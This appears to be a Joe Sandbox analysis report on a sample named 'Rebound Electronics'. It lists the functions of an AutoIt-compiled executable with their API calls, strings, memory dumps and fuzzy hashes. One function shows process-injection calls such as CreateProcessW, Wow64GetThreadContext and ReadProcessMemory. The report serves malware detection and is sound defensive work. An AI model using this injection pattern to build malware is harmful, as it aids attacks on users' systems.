CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C236E6
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C23707
ShowWindow.USER32(00000000,?,?,?,?,00C23AA3,?), ref: 00C2371B
ShowWindow.USER32(00000000,?,?,?,?,00C23AA3,?), ref: 00C23724

Strings

edit, xrefs: 00C23701
AutoIt v3, xrefs: 00C236DE, 00C236E3, 00C236E4

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: a881a1d73fb016c60303c456250081a8126e80c0b25d7396fb0b67600e221a4d
Instruction ID: d702dc145fafdab413e6676994e1042eebc0173eb96a7a9247773d0cb82ed422
Opcode Fuzzy Hash: a881a1d73fb016c60303c456250081a8126e80c0b25d7396fb0b67600e221a4d
Instruction Fuzzy Hash: 55F0DA755402D07AEB319757AC88F6B2E7DD7C7F24F04001ABE05AA1A0D57108E5DAB0

Function 018CC0C0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 145
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 018CBFB0: Sleep.KERNELBASE(000001F4), ref: 018CBFC1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 018CC1E2

Strings

I8TPQVGN2R7BAHZO8KGCA1X, xrefs: 018CC245, 018CC248

Memory Dump Source

Source File: 00000000.00000002.1692975510.00000000018C9000.00000040.00000020.00020000.00000000.sdmp, Offset: 018C9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c9000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: CreateFileSleep
String ID: I8TPQVGN2R7BAHZO8KGCA1X
API String ID: 2694422964-2855532753
Opcode ID: 51265216662f8ea9bffa8e882b1695d8347f67098bdf25c304a70b075932d2aa
Instruction ID: 0d4c10766336e09c63cd18fd6b0a5c22472915b002fd2d7b8fc2c69fa3b8032b
Opcode Fuzzy Hash: 51265216662f8ea9bffa8e882b1695d8347f67098bdf25c304a70b075932d2aa
Instruction Fuzzy Hash: A1517070D04289DAEB11DBE8C845BEEBBB9AF15704F00419DE608BB2C1D7B94B48CB65

Function 00C251AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00C2522F
_wcscpy.LIBCMT ref: 00C25283
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C25293
LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00C93CB0

Strings

Line: , xrefs: 00C93CD9

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memset_wcscpy
String ID: Line:
API String ID: 1053898822-1585850449
Opcode ID: 4c15ef63874e6b5dd63d5af8379e500f6df0dc3fec51f3ee7f116851d644065e
Instruction ID: db079d4b7649bb78101ed9a8adce99f5e681a79d0e5f74bcd331f6aff73e729d
Opcode Fuzzy Hash: 4c15ef63874e6b5dd63d5af8379e500f6df0dc3fec51f3ee7f116851d644065e
Instruction Fuzzy Hash: 0431F1715087A0AFD320EB60EC46FEF77E8AF44310F00451EF99596891EB70A658DB92

Function 00C24139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON

Download Yara Rule

APIs

Part of subcall function 00C241A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00C239FE,?,00000001), ref: 00C241DB

_free.LIBCMT ref: 00C936B7
_free.LIBCMT ref: 00C936FE

Part of subcall function 00C2C833: __wsplitpath.LIBCMT ref: 00C2C93E
Part of subcall function 00C2C833: _wcscpy.LIBCMT ref: 00C2C953
Part of subcall function 00C2C833: _wcscat.LIBCMT ref: 00C2C968
Part of subcall function 00C2C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00C2C978

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00C93491
Bad directive syntax error, xrefs: 00C936E4

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 805182592-1757145024
Opcode ID: dff65c64a7571d7096e77ee83c3db9222a27e62ae7b1c744b32d93a2028f2744
Instruction ID: 3215fcaa29ee96418aab25629e0d668bc2af791f436478343617dec323dfb61c
Opcode Fuzzy Hash: dff65c64a7571d7096e77ee83c3db9222a27e62ae7b1c744b32d93a2028f2744
Instruction Fuzzy Hash: 46919271910269EFCF14EFA5DC959EEBBB4FF18310F10442AF826AB291DB309A45DB50

Function 00C24A30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00C25374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00CE1148,?,00C261FF,?,00000000,00000001,00000000), ref: 00C25392

Part of subcall function 00C249FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00C24A1D

_wcscat.LIBCMT ref: 00C92D80
_wcscat.LIBCMT ref: 00C92DB5

Strings

\Include\, xrefs: 00C24B0A
\, xrefs: 00C92DA2

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: _wcscat$FileModuleNameOpen
String ID: \$\Include\
API String ID: 3592542968-2640467822
Opcode ID: e26b2eddf90b07e173c36765dccf2ed5df41a97df3afc098297e94c2dc55c8a3
Instruction ID: a7a555417cfdc18dfb2cd3e2bb73990d80434f1949e034eca4c4adcacc5fe4bf
Opcode Fuzzy Hash: e26b2eddf90b07e173c36765dccf2ed5df41a97df3afc098297e94c2dc55c8a3
Instruction Fuzzy Hash: 8E514CB24043909BC714EF65E9C1B9EB7F8BF59300B50452EF6858B661EB709F08DB62

Function 00C434AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__getstream.LIBCMT ref: 00C434FE

Part of subcall function 00C47C0E: __getptd_noexit.LIBCMT ref: 00C47C0E

@_EH4_CallFilterFunc@8.LIBCMT ref: 00C43539
__wopenfile.LIBCMT ref: 00C43549

Strings

<G, xrefs: 00C434CD, 00C434F0, 00C434FC

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
String ID: <G
API String ID: 1820251861-2138716496
Opcode ID: 38ba7e38bf1362b5ab9363890fc48308c437653e7bdcef61597a63577ea43b56
Instruction ID: af6c1775e3f02932cb7f69b5d5224845b8095cdc3982a0e0f2818e62f1a2c3e4
Opcode Fuzzy Hash: 38ba7e38bf1362b5ab9363890fc48308c437653e7bdcef61597a63577ea43b56
Instruction Fuzzy Hash: 9611E971A00246EFDB12BFB58C426AE3AB4BF85750B158525F825DB2C1EB34CB01B7B1

Function 00C3D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00C3D28B,SwapMouseButtons,00000004,?), ref: 00C3D2BC
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00C3D28B,SwapMouseButtons,00000004,?,?,?,?,00C3C865), ref: 00C3D2DD
RegCloseKey.KERNELBASE(00000000,?,?,00C3D28B,SwapMouseButtons,00000004,?,?,?,?,00C3C865), ref: 00C3D2FF

Strings

Control Panel\Mouse, xrefs: 00C3D2BA

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: c734606785280314821ea69ea678233bd4a078e4e6b927b0ac186a0c4fbc204c
Instruction ID: ec406ef283e4b981098839964c03dde89a39dafde0203aca8b70ca91a9d65d23
Opcode Fuzzy Hash: c734606785280314821ea69ea678233bd4a078e4e6b927b0ac186a0c4fbc204c
Instruction Fuzzy Hash: 4E112A75621208BFDB509F64DC84EEF7BBCEF45744F104469B907D7220E6319E419B61

Function 018CAFB0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 018CB7DD
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 018CB801
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 018CB823

Memory Dump Source

Source File: 00000000.00000002.1692975510.00000000018C9000.00000040.00000020.00020000.00000000.sdmp, Offset: 018C9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c9000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
Instruction ID: 8b76fe310427e31acdd8aafb6102cc1b23df599f6b73e282c4c35930192ebc33
Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
Instruction Fuzzy Hash: AD622B30A14658DBEB24CFA4C841BDEB372EF58740F1091A9D20DEB3A4E7759E81CB59

Function 00C4365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C436B7
_memcpy_s.LIBCMT ref: 00C43729
__filbuf.LIBCMT ref: 00C437AA
_memset.LIBCMT ref: 00C437EE

Part of subcall function 00C47C0E: __getptd_noexit.LIBCMT ref: 00C47C0E

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit_memcpy_s
String ID:
API String ID: 3877424927-0
Opcode ID: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
Instruction ID: 89593270f57a9394fd143c4c3a487c1482bfb8ea07c3012aad46f9ff0cd502ad
Opcode Fuzzy Hash: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
Instruction Fuzzy Hash: A751A3B0A00386ABDB249FA989856AE77B1BF80320F258729F875962D0D7749F50DF40

Function 00C6C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 00C24517: _fseek.LIBCMT ref: 00C2452F

Part of subcall function 00C6C56D: _wcscmp.LIBCMT ref: 00C6C65D
Part of subcall function 00C6C56D: _wcscmp.LIBCMT ref: 00C6C670

_free.LIBCMT ref: 00C6C4DD
_free.LIBCMT ref: 00C6C4E4
_free.LIBCMT ref: 00C6C54F

Part of subcall function 00C41C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00C47A85), ref: 00C41CB1
Part of subcall function 00C41C9D: GetLastError.KERNEL32(00000000,?,00C47A85), ref: 00C41CC3

_free.LIBCMT ref: 00C6C557

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
Instruction ID: 7137f26ad5d70465ee0d6587c409b4a9e0db8ab1954427bdfd37c3cc92b70360
Opcode Fuzzy Hash: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
Instruction Fuzzy Hash: DC515DB1A04218AFDB249F64DC81BBDBBB9FF48300F1040AEF659A3251DB715A809F59

Function 00C3EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C3EBB2

Part of subcall function 00C251AF: _memset.LIBCMT ref: 00C2522F
Part of subcall function 00C251AF: _wcscpy.LIBCMT ref: 00C25283
Part of subcall function 00C251AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C25293

KillTimer.USER32(?,00000001,?,?), ref: 00C3EC07
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C3EC16
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C93C88

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: ac8969bf1e77ed23783225f37f9fec1a987e4b74c9a8382640072d50e347e471
Instruction ID: beea896a3269e4b717177d9eda236ae6382df5ab67b32290f8d208a1c0300e63
Opcode Fuzzy Hash: ac8969bf1e77ed23783225f37f9fec1a987e4b74c9a8382640072d50e347e471
Instruction Fuzzy Hash: 3121AA715047D4AFEB329B249859BEFBBEC9B05708F04048DE69B57181C3746B84CB51

Function 00C240E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C93725
GetOpenFileNameW.COMDLG32 ref: 00C9376F

Part of subcall function 00C2660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C253B1,?,?,00C261FF,?,00000000,00000001,00000000), ref: 00C2662F

Part of subcall function 00C240A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C240C6

Strings

X, xrefs: 00C9373E

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 2c0fdc9904369159b8d5a7292a62bef1d5e1595197a40d7e87c645997cc1cd14
Instruction ID: 76df56eba5f2bc90f4762c064cbe34ae705cca7dd2ed2919d2f88b3c2a3979d5
Opcode Fuzzy Hash: 2c0fdc9904369159b8d5a7292a62bef1d5e1595197a40d7e87c645997cc1cd14
Instruction Fuzzy Hash: 5121E7B1A002A89FCF05DFD4D8457DE7BF9AF49304F00405AE905AB241DBB45A899F61

Function 00C6C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00C6C72F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00C6C746

Strings

aut, xrefs: 00C6C740

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 8eff433e53b3116f244ad972c4ddaddd82ce2115624c715cff7e9d64f3e6e776
Instruction ID: 35b7bec3e8384929ba3683eb8e332dd945142c153befa9ec112471fc65e225b5
Opcode Fuzzy Hash: 8eff433e53b3116f244ad972c4ddaddd82ce2115624c715cff7e9d64f3e6e776
Instruction Fuzzy Hash: 5AD05E7550030EABDB10AB90DC0EFCA776C9700708F0002A17752A60B1DAB0EA99CB55

Function 00C7F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce009d9b864d97638376f08eda45ef515a3ed5335a7079bbe4d47b7075125592
Instruction ID: 19acd4389bf2b3ab1cd3f9726ca2170d3964a5c5224c8ac4cb714b67934e19e9
Opcode Fuzzy Hash: ce009d9b864d97638376f08eda45ef515a3ed5335a7079bbe4d47b7075125592
Instruction Fuzzy Hash: 5DF14B716083019FDB20DF24C485B5EB7E5FF88314F14896DF9A99B292D770E946CB82

Function 00C24FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C25022
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C250CB

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: 7d501ff98eea971df9804cc4a02742f7bcfdf62274ff71f56b54dbc6d5d99648
Instruction ID: 10941c9413de939ac8e3becb6db6607d44b960044552529ee873d58522fe640e
Opcode Fuzzy Hash: 7d501ff98eea971df9804cc4a02742f7bcfdf62274ff71f56b54dbc6d5d99648
Instruction Fuzzy Hash: 7531D2B1604751CFC720DF24E88479BBBE4FF48318F00092EFAAA87650E7716A44CB92

Function 00C4395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00C43973

Part of subcall function 00C481C2: __NMSG_WRITE.LIBCMT ref: 00C481E9
Part of subcall function 00C481C2: __NMSG_WRITE.LIBCMT ref: 00C481F3

__NMSG_WRITE.LIBCMT ref: 00C4397A

Part of subcall function 00C4821F: GetModuleFileNameW.KERNEL32(00000000,00CE0312,00000104,00000000,00000001,00000000), ref: 00C482B1
Part of subcall function 00C4821F: ___crtMessageBoxW.LIBCMT ref: 00C4835F

Part of subcall function 00C41145: ___crtCorExitProcess.LIBCMT ref: 00C4114B
Part of subcall function 00C41145: ExitProcess.KERNEL32 ref: 00C41154

Part of subcall function 00C47C0E: __getptd_noexit.LIBCMT ref: 00C47C0E

RtlAllocateHeap.NTDLL(01880000,00000000,00000001,00000001,00000000,?,?,00C3F507,?,0000000E), ref: 00C4399F

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: a690631f6f3f425f9a27a3a5f3b798dfd42fd034438d3bc6ebe29beb234199dd
Instruction ID: c0812f2847423a5a8d842fa3032de9eaf2868311f3540a804fc1a3085a2326e5
Opcode Fuzzy Hash: a690631f6f3f425f9a27a3a5f3b798dfd42fd034438d3bc6ebe29beb234199dd
Instruction Fuzzy Hash: E701B5313452819AE6223B75DC86B6E3358BFD1760F25012AF9159B2C2DFF49E4096A0

Function 00C6C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00C6C385,?,?,?,?,?,00000004), ref: 00C6C6F2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00C6C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00C6C708
CloseHandle.KERNEL32(00000000,?,00C6C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C6C70F

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 36926da941bdb837a2e6cd6b3aa11e3f36fe618d955dd0e55eb9d494a6957f8f
Instruction ID: 4859118d955b84fb2c5bd880bf46ac9235afed145c974dd75897b1ef769a17c4
Opcode Fuzzy Hash: 36926da941bdb837a2e6cd6b3aa11e3f36fe618d955dd0e55eb9d494a6957f8f
